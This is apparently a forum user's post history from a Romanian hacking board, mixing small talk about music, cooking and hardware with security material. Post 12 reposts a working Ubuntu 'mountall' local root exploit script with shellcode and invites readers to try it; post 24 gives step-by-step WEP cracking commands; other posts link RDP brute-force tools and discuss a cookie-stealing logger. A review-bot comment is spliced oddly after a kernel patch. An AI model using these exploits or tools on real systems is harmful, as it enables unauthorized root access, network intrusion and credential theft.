Everything posted by Nytro

  1. Hmm:
       GET /u57536064/audio/0461a6471ce5.mp3 HTTP/1.1
       Accept: */*
       Host: cs4836.vkontakte.ru
       User-Agent: GJ LdzcJv22SAdkQiBH5hD it4qD47 I YdAfpixJ AGdb1RdLcK
       Connection: close
     Anyway, it worked for me, I downloaded Florin Salan.
  2. Haaa, it works on Wine and it finds manele for me :->
  3. To jail, to jail, to jaaaaaaaaaaaaaaaaaaiiiiiiiiiiiiiiiil! _|_
  4. archaeus5: For now all I know how to make is pancakes. But I'll try all kinds of junk. Park: I like psychology too; I've read one book and, from another, only the parts that interested me. But it's as if they "take you into their world": they abound in psychological terms, in various scientific names for every trivial thing, and they leave you a bit in a fog.
  5. I got myself a book too: "1000 Recipes for Beginners and Amateur Cooks"
  6. Man, I don't like this crap at all...
  7. Mine: "This page has had 4,338 visits". Usually I think they look after they get a warn, probably hoping to find something interesting.
  8. I piss on him, let him die in jail, him and everyone like him who steals. And yes, thanks to the media for making the word "hacker" synonymous with THIEF.
  9. It probably uses the Nirsoft utilities to get the desired data; I don't see what would be wrong with that.
  10. Wikipedia: "PaX is a patch for the Linux kernel that implements least privilege protections for memory pages. The least-privilege approach allows computer programs to do only what they have to do in order to be able to execute properly, and nothing more. PaX was first released in 2000."
  11. You're weak; with a Nokia 3310 you can sniff calls, you can record them.
  12. Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability
      #!/bin/sh
      # by fuzz. For Anux inc. #
      # ubuntu 10.04 , 10.10
      if [ -z "$1" ]
      then
      echo "usage: $0 <UDEV KERNEL EVENT>"
      echo "see here http://www.reactivated.net/writing_udev_rules.html"
      exit
      fi
      cat > usn985-exploit.sh << EOF
      #!/bin/sh
      chown root:root $PWD/usn985-sc
      chmod +s $PWD/usn985-sc
      EOF
      cat > usn985-sc.c << EOF
      char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68"
      "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
      main(){int *r;*((int *)&r+2)=(int)s;}
      EOF
      gcc usn985-sc.c -o usn985-sc
      echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules
      chmod +x usn985-exploit.sh
      echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)"
      echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root"
      Vulnerable: Ubuntu Ubuntu Linux 10.04 LTS
      Not Vulnerable: Ubuntu mountall 2.15.2
      Ubuntu Linux is prone to a local privilege-escalation vulnerability that affects the 'mountall' package. Local attackers can exploit this issue to execute arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer. Ubuntu 10.04 LTS is vulnerable; other versions may also be affected.
      Update: http://security.ubuntu.com/ubuntu/pool/main/m/mountall/mountall_2.15.2_i386.deb
      Try it too, those of you with Ubuntu.
  13. It seems like complete nonsense to me. 1) $ipLog="cookies.html"; - The data is saved in an HTML file, which means a possible XSS (well, not very useful, but who knows). 2) $cookie = $HTTP_GET_VARS["c"]; - That's not a cookie. Yes, it saves some data, but that's about it, no cookie. And it can be done more elegantly: use php_gd and generate a PNG image, so nobody would be able to tell (not necessarily) that it's a PHP script.
  14. Not here. Trashed.
  15. [PATCH] /drivers/acpi/acpica/nsrepair.c (2.6.34.7) - Fixed useless compile warning Warning: drivers/acpi/acpica/nsrepair.c: In function ‘acpi_ns_repair_object’: drivers/acpi/acpica/nsrepair.c:125:29: warning: ‘new_object’ may be used uninitialized in this function Patch: --- a/drivers/acpi/acpica/nsrepair.c 2010-09-20 08:35:56.568006487 +0300 +++ b/drivers/acpi/acpica/nsrepair.c 2010-09-20 08:00:40.000000000 +0300 @@ -122,7 +122,7 @@ acpi_ns_repair_object(struct acpi_predef union acpi_operand_object **return_object_ptr) { union acpi_operand_object *return_object = *return_object_ptr; - union acpi_operand_object *new_object; + union acpi_operand_object *new_object = NULL; acpi_status status; ACPI_FUNCTION_NAME(ns_repair_object);
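      Review bot: the "= NULL" initializer on new_object in acpi_ns_repair_object silences the "may be used uninitialized" warning reported at nsrepair.c:125, but neither the subject line nor the hunk shows why that warning is a false positive. If any path through the function does reach line 125 without assigning new_object, this change turns an uninitialized read into a NULL pointer use and hides the compiler's only hint about it. Please say in the commit message which path the compiler cannot see through and confirm that new_object is always assigned before line 125; if it is not, handle that path explicitly rather than initializing at the declaration.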
  16. ISO/ISC DTR 19769 (August 21, 2010) Working Draft, Standard for Programming Language C++ Download: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2010/n3126.pdf Interesting, and it has only 1331 pages (they could have added another 6 with pictures).
  17. I prefer Asus, Intel, ATI. Why? I have no idea. But they seem like serious companies to me, more serious than their competitors. For me it's like Nokia vs. anything else. Their products seem higher quality to me. I don't know how to put it, but between an Intel processor and an AMD one with exactly the same "qualities" (features) I would choose Intel.
  18. Open Source File Archivers for Linux
      Posted by jun auza On 9/16/2010
      A computer program that merges a number of files together into one archive file, or a series of archive files, for simpler transportation, storage, or backup is called a file archiver. Archiving or packing refers to the process of making an archive file, while unarchiving, unpacking or extracting means reconstructing the original files from the archive. The simplest file archivers just gather a list of files and concatenate their contents sequentially into the archive. For transferring a large number of individual files over a high latency network like the Internet, numerous file archivers employ archive formats that provide lossless data compression to reduce the size of the archive.
      If you are looking for a capable free and open-source file archiver for Linux, you should check out this list, and then pick out the one that would suit your needs:
      Xarchiver
      Xarchiver is a popular GTK+2 based file archiver that is designed to be independent of the desktop environment. It is utilized in a good number of lightweight Linux distributions like Xfce and LXDE. Xarchiver supports 7-zip, arj, bzip2, gzip, rar, lha, lzma, lzop, deb, rpm, tar and zip archives, archive navigation with mimetype icons, archive comment ability and archive listing as HTML or txt. Cut/Copy/Paste/Rename actions within files of variety of archives are also supported. Password detection and protection is automatic for arj, zip and rar files.
      File Roller
      File Roller is a simple and easy-to-use archive manager for the GNOME desktop environment. It has a graphical user interface and can create and modify archives, view the content of an archive and files contained in the archive, and of course extract files from the archive. It supports plenty of archive files such as 7-Zip (.7z), Tar, WinAce (.ace), gzip, RAR, and a whole lot more.
      Ark
      Ark is an archiving tool for the KDE desktop environment that is included into kdeutils package. It can view, extract, create, and modify archives through its intuitive GUI. Ark can handle different file formats that include tar, gzip, bzip2, zip, rar and lha. If the appropriate plugin from kdeaddons package is installed, it can be integrated into Konqueror in the KDE environment to handle archives through KParts technology.
      PeaZip
      PeaZip is both a file manager and file archiver that supports its native PEA archive format, featuring compression, multi volume split and flexible authenticated encryption, and integrity check schemes. It also has support for other mainstream formats, with special focus on handling open formats. With PeaZip, users can run extracting and archiving operations automatically using command-line generated exporting the job defined in the GUI front-end. For speeding up archiving or backup operation's definition, it can also create, edit and restore an archive's layout.
      FreeArc
      FreeArc is a fast and efficient file archiver that is said to work 2–5 times quicker than best programs in each compression class (ccm, 7-zip, rar, uharc -mz, pkzip) while retaining the same compression ratio. From technical grounds, it is superior to any existing practical compressor. Features include:
      * AES/Blowfish/Twofish/Serpent encryption
      * FAR and Total Commander plugins
      * Solid compression with smart updates
      * Ability to create self-extracting archives and installers
      * Archive protection and recovery
  19. Liviu Guta, Florin Peste and Play AJ - Sambata, duminica :->
  20. The idea is simple. I don't care whether it's infected or not. If you're smart guys, you run it in a virtual machine. If you're even smarter, you don't download it, so you don't run it.
  21. Damn stupid kid. http://www.virustotal.com/file-scan/report.html?id=28d0e945f0648bed7b7b2a2139f2b9bf1901feec39ff4f6c0315fa58e054f44e-1283279679 It's detected as HACKTOOL, that is, not as TROJAN or whatever else your mother stuffs up your ass. Ban. Let all the losers like the one above understand this. There are also programs that don't steal Firefox passwords (PSW.Stealer) or don't allow remote control of your computer (Backdoor, RAT, Trojan) or other things, but that ARE DETECTED. That doesn't necessarily mean they crap in your computer. I don't sit and check whether every program I post is infected; nobody is going to do that. Scan on virustotal and look for yourselves at what exactly a program is detected as. Or better, check for yourselves whether the program is infected and that's it; stop coming here with "it's infected" or other nonsense.
  22. These are the Top 20 Hacking Tools; the list is exhaustive, these are a few to name.
      Nessus
      The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.
      Ethereal
      Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.
      Snort
      Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.
      Netcat
      Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol.
      TCPdump
      TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.
      Hping
      Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).
      DNSiff
      DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).
      GFI LANguard
      GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.
      Ettercap
      Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis.
      Nikto
      Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.
      John the Ripper
      John the Ripper is a fast password cracker, currently available for many flavors of Unix.
      OpenSSH
      OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.
      TripWire
      Tripwire is a tool that can be used for data and program integrity assurance.
      Kismet
      Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.
      NetFilter
      NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packet mangling.
      IP Filter
      IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.
      pf
      OpenBSD Packet Filter
      fport
      fport identifies all open TCP/IP and UDP ports and maps them to the owning application.
      SAINT
      SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.
      OpenPGP
      OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.
      Source: Top 20 Hacking Tools | Hacking Truths
  23. I think it's without a password here: Download RDP Brute v.0.6.rar from Sendspace.com - send big files the easy way
  24. CRACK WIFI – Simple WEP Crack
      Overview
      To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.
      Equipment used
      Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
      Software : Backtrack 4 (Free download from BackTrack Linux - Penetration Testing Distribution)
      Step 1 – Start the wireless interface in monitor mode on AP channel
          airmon-ng start wlan1 6
      starts wifi interface in channel 6
      Step 2 – Test Wireless Device Packet Injection
          aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E wlan1
      -9 means injection
      -a 00:1B:11:24:27:2E is the access point MAC address
      Step 3 – Start airodump-ng to capture the IVs
          airodump-ng -c 6 --bssid 00:1B:11:24:27:2E -w output wlan1
      Step 4 – Use aireplay-ng to do a fake authentication with the access point
      In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
          aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
      -1 means fake authentication
      0 reassociation timing in seconds
      -e infosec is the wireless network name
      -a 00:14:6C:7E:40:80 is the access point MAC address
      -h 00:0F:B5:88:AC:82 is our card MAC address
      OR
          aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
      2 – Reauthenticate every 2 seconds.
      -o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
      -q 10 – Send keep alive packets every 10 seconds.
      Troubleshooting Tips
      Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and… Run:
          tcpdump -n -vvv -s0 -e -i | grep -i -E "(RA:|Authentication|ssoc)"
      You would then look for error messages.
      If at any time you wish to confirm you are properly associated, use tcpdump and look at the packets. Start another session and… Run:
          tcpdump -n -e -s0 -vvv -i wlan1
      Here is a typical tcpdump error message you are looking for:
          11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
      Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
      If you want to select only the DeAuth packets with tcpdump then you can use:
          tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth
      You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.
      Step 5 – Start aireplay-ng in ARP request replay mode
          aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
      Step 6 – Run aircrack-ng to obtain the WEP key
          aircrack-ng -b 00:1B:11:24:27:2E output*.cap
      All Done!
      Source: Crack Wifi | Hacking Articles
  25. RDP Scanner [bruteForce]
      I haven't tried it, I don't know if it's infected.
      RDP Brutus, based on all known tss Brutus.
      * Select the type of scan IP: one specified range, either immediately on the list of ranges.
      * Option flows for the scanner, the ability to change the port for the scan
      * Settings flows for Brutus (how IP will be checked on a separate thread)
      * Ability to scan without Brutus
      * Brutus, a list of usernames to the list of passwords
      * Work anywhere on the disk (including the Russian way)
      * Avtosvorachivanie windows Brutus
      * Edit the list of usernames and passwords directly from the program
      * Output sbruchennyh grandparents in a separate window by pressing the button at any time (even in the Brut)
      * Sending Hoods at your number ICQ (master Ween - Ie only the number that you want to send - you can specify in the preferences)
      Howto: http://www.file-upload.net/download-2791486/h4cky0u.txt.html
      Download: http://www.sendspace.com/file/tv1whv
      Source: h4cky0u